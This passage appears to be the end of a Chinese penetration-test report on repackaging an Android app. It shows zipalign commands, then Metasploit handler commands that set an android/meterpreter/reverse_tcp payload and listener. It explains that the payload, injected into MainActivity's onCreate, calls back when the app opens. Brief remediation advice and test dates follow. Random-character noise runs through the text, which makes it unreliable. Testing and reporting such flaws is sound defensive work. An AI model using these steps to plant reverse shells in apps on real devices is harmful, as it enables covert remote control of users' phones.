8 m" F2 s* z0 f" o - I/ C# c0 `7 } 对齐 7 N! s# v: O. S+ F7 A ; l1 V2 y3 w/ C, @7 g3 }1 d/ u

+ e0 _9 K( b, Z& J' f 8 @0 S' x- | B' M. h' r 字节对齐优化 $ \! H7 Y0 } r& a$ m+ _5 F 1 Z( V+ n* n8 f2 W$ K" U/ h1 e$ [

7 q9 E2 q* ]7 L: {* w " `# {% B' C" D6 M1 Y8 B1 D zipalign -v 4 repackaged.apk final.apk : O. }5 J" ]$ h: {1 I, Y , i; _; g9 x4 C" _1 U7 X* {

- \; r) N& T0 w B* q j, a, E ; z) X1 X! `( I; k) {) b. x; _ 检查是否对齐 ; T: _6 g) ~0 ^ j6 y * d7 j% _6 @/ Q: X$ W

_& y2 d% i$ k% o 5 Q2 a3 A! Q! @/ I3 U+ _ zipalign -c -v 4 final.apk * i8 l& V ~1 O/ n9 ^& ?+ S K . t5 k, C0 R8 v8 I# S1 z

, f& O9 f, ?" U. L8 B$ a7 V/ c 4 q- F7 i) }- J+ ?6 C) `5 b0 ~& _! t% f 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 t% J1 i- i3 E) v x4 y8 O. u& P0 r

8 W) M# M& S: f6 q # O0 [* P! P/ b; q$ ]7 H" w 启动Metasploit控制台，配置参数等待上线 ' t0 T2 ~1 J) s! `3 I ) r: b* T8 z( H2 i

2 j+ d, |( C: [ % L% P% x2 t) w$ S 在终端依次输入如下命令 - P- ^2 ^5 m c9 N4 h: d ; n6 u0 r q( ~3 F% V; Y

% L) E1 m3 q4 F # g+ ]$ W# q+ p8 j% ~ msfconsole 1 H6 E: {4 ?; ?& M0 L# ]& b; T/ ]; }6 K

$ V0 S% k+ G4 N9 Z, V0 e8 N * l9 t+ e$ [2 p9 E use exploit/multi/handler 2 a! |% F/ p! m z+ ~- `/ ?& k$ L- j6 C+ z+ l ~* `

3 q. p$ w4 }7 R. \( x) W3 s; n # h" I3 I3 E: C1 h0 x7 A: O set PAYLOAD android/meterpreter/reverse_tcp + T: S- y! x( U6 {: x 2 ^$ E! o) P+ s- n% ~9 ?5 a$ @

* k, M* l; w9 ^: }. }4 S3 } 4 ?0 j! s; r; x; v Q3 z u set LHOST 192.xxx.xx.xx 8 q! H+ \6 c# N6 `4 ? ) z' }& @# ]; G' e( C* D! s

1 \% N( K5 F3 l . R7 K& ]& f Y4 C5 A, U set LPORT 4444 - ^, d% h+ X9 K# u7 K! x/ H( Y& n6 `1 e' w8 \/ i

0 M1 S O, j8 i- b- Z q2 n$ a$ [1 ~* t+ k/ Q! g exploit ' l* @' l1 W- P1 {% O. q% ?- V ) ^9 a4 B& T8 t7 Y

, t4 V+ o! `; n8 N4 H% ~8 a+ P- P& l! I; s% J 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： G( o) I1 o" J2 c + F6 Q8 d* p8 P8 {, w

R+ ] C5 u& G: e , L+ G# H5 y2 ] x 漏洞危害：中 ' w l4 [# C9 W% b, N0 ^ , Y b7 I h" _/ Y

1 K# [. x* `# `0 A# M$ w5 H+ I9 y! z ) \! ~ @! E3 ? m( F8 q# G% P7 \| , H/ c1 Y3 M4 k, j9 Q 严重程度 3 b0 B% d& N/ X; Q( w3 C! A$ y9 a2 r8 V8 k7 a3 t: e) H a* o 9 `+ p- j1 K) }8 ]$ {! {0 Z7 y 8 q! v9 x. q' F- G+ Z1 O! F- U	H3 Y! K( d+ `8 F% o5 G , Y: H; b: P2 Z/ @; s( m* g ! b7 K* r# H) c0 C6 S5 ? * x' Y- g. e$ R5 u$ k 高 / Z" y% Z2 v2 {; C ; x) Q' r, v1 b5 q6 n, c ( s& y C# n+ Y7 l4 }9 P! `2 ]' k3 S	: ^$ N# d1 d/ S* L9 u, I2 S . q* _) W8 r; G4 _+ R0 K 0 g4 \| U0 h3 V6 `1 v, n5 Z5 k; G2 C. K" q ■ / B! s" [# x; ~1 E! T; f; k$ t- ^9 y6 i 5 A0 V' f3 B, J4 \| 7 B- d; D" A. A* W M2 _. K ; {4 }9 N, ?% ?% i3 Z! R	; E. a. t4 e% ~ _( @2 ~ 9 X- H8 {( v" S- P) f; c + Y# Z2 E# U! M7 }6 W / o6 {0 u- i, M9 R/ d 中 : `9 Z' ^4 O. t: c " V. R4 w, F( t . ]8 T: g# m8 ^: V% z, a 4 u' D( s; n1 ]6 k' c. {) s* z	) a+ r: X1 N6 S$ g; h5 W' R # S% H k! }3 W7 e# a [5 C & V* Y7 V! O2 T6 ?: w, X7 [8 U" L ) X* `& k# h9 u* P, R& h7 o & w2 P* } }+ J5 u ' {, i1 [. ]; d0 z' Y1 W' _ ( T% a$ y' e0 R) H1 a+ ]* q3 ? 7 R s6 d" z3 {2 x2 c8 {% d) s0 r ; k& C1 i8 l# R- V, Z" v4 D	* J, _0 x* o. i# \|: s . {" ]$ L/ a# _* L/ e3 _5 F6 u# ]. K N+ {9 o& q+ o$ w / o' q$ p( }& v+ ^9 D 低 0 Y) l, o2 S3 d) R/ _0 Q % E5 P2 j9 c' t3 l u! M # }8 F9 V8 l; i* G 9 G& X9 G( z; U8 r$ ~0 J. v! ?) W* G	# o3 [8 z- N, E% z3 F . R4 O2 j0 s* ~6 E f8 J 6 H0 \|) b; A" [9 s/ q- G/ g5 L3 t0 s/ n: o( q! h# z ) h A) b) C4 A4 S& K ( i( L; E% L4 L 9 S8 y& ]9 T5 ~4 S Y/ p* j : t g0 i- L( U5 Q, W$ _ ' R. N0 V' d8 J5 \|7 r5 p+ f - o0 c a) J* n5 M5 u: q) M, S# \|7 L

7 _6 T1 K0 b6 M8 t6 x1 [- c) f& C7 C ]6 T0 { g% Q3 I1 o6 w9 @ & q' F$ Q% F8 [9 b }- Q7 H3 w: g- Y* A

; h- S& W- j! N; p4 L ' w) j# `; w3 P" d& L8 E: e5 n1 p 修复方法： % ~& c* h% Z, t! t/ z s! ~' Z( j$ F$ q5 o# ]0 l

5 K) x1 r. S9 y" ^ X : f1 F1 V1 ^, j! q0 H6 w. v. K( b6 Q 1.在 APP 启动时应做签名校验防止二次打包。
9 j# j1 @& r6 W' ^: b7 W1 ~/ {1 j' M8 v7 r+ y 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ) V" u0 S" F) r/ [( C$ e, e ! b/ l) C& b1 ]; K, |8 @

3 k2 b/ _5 ]9 G9 p3 z 3 x8 A: Q L( E$ i; ? m+ q/ R# J ]. b% N' E1 Y8 G+ z. k% g) n1 y7 K/ O! t$ D$ n( U

6 E4 N5 k D) Q' \" d9 }! X" P- x. y# b5 m! l
+ S. _1 _0 Q+ W3 x3 a) T* ~ . D7 w! g% q1 f/ h. |! Z9 h

- s0 w I) M( p) a3 D9 R! ~$ }1 K 4 i! a! y. M. o" k V/ _ j7 K' b. d0 V4 _$ `; \| 8 ~$ \: _* e" V, I1 I- l4 M5 @. D 渗透测试时间 " S0 J) d8 R& K, K3 R: {; R% q- P7 u) O ~3 ~5 ^; k1 \| 2 [( N3 Y$ J, Q 4 J$ X& _" F: E3 l% r
1 W7 a8 T: Z1 t# t, \# R+ d+ K- W8 I$ \4 t3 @0 V) w: \|1 U5 v ' I) N0 L2 F0 y) I4 G! H r 9 X, @, E# L* \- Y' c 起始时间 ! A: S/ C' g) P2 V1 _' v; w! q. I1 A9 K% c - L: ~6 d! p( h$ R 5 S0 E4 C2 V6 J8 \|" A2 Z q	7 u$ K* \2 u6 H) [" j% j* G4 k! d8 k1 }1 E / T6 l/ x" `' x # B! M0 Q8 \|- E- \& D 2020年4月6日 9 W% X" [( N1 h- X# o + ]9 B9 m8 U: t3 k' r4 o3 t) W- c . s/ n6 Q6 ^$ X. f( ]$ u2 `% [ F$ _9 [
" [* y3 j0 r0 ?5 M+ S! K( }- ~ 8 d: F& j4 n0 m& a/ s: A4 ~ ' Q, `- v% T9 n1 Z" B 4 E) R+ Y2 \- x9 @$ n 结束时间 ( h0 q9 q: x& z( V 3 q; A0 y$ f- G 7 J& d! F3 l1 r4 e 7 ~/ i- v# N7 O; H" `; Q7 O* C4 k3 g	0 V% H( G) N/ U+ `0 @* [5 k# u. c 8 ?! i2 U ?; d. W / j3 V1 z+ X0 `/ @ * U: g3 r# @1 \) a* b) {: ~0 b 2020年4月9日 5 b- {' a3 x! S# O, S : Z: g. ^+ P( ~( N9 k4 q / L; Z" B1 b6 G9 F `2 p/ ]: k4 H, h

中国网络渗透测试联盟